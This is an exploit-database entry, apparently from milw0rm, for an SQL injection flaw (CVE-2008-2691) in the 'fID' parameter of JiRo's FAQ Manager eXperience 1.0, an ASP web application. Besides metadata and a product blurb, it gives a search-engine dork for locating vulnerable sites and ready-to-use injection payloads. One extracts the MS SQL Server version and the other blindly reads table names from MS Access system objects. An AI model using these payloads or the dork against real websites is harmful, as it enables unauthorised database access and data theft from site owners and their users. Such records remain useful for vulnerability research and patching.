JiRo's FAQ Manager eXperience 1.0 - 'fID' SQL Injection

Author: Zigma
type: webapps
platform: asp
port: 
date_added: 2008-06-07 
date_updated: 2016-12-05 
verified: 1 
codes: OSVDB-46039;CVE-2008-2691 
tags: 
aliases:  
screenshot_url:  
application_url: 

[+] Script Name     : JiRo´s FAQ Manager eXperience
[+] Version         : v 1.0
[+] Price           : _ Single Website License 34.95 $
                      _ 2 Websites License 62.95 $
                      _ 5 Websites License 139.95 $
[+] Author          : Underz0ne Crew
[+] Home            : http://www.underz0ne.net
[+] Script In short : ('JiRos FAQ Management System is an essential
element for any webmaster, providing your customers with answers to
specific questions on-line 24 hours a day, 7 days a week. Build a
complete knowledge base, adding articles and creating your own topic
based FAQ system using our feature packed administration facility ')
[+] Dork            : inurl:"read.asp?fID="

--//--> Exploit :

read.asp?fID={SQL}

__--> MS SQL Server : convert(int,(select+@@version));

__--> MS Access     : IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'Bingo')%00

--//-->

# milw0rm.com [2008-06-08]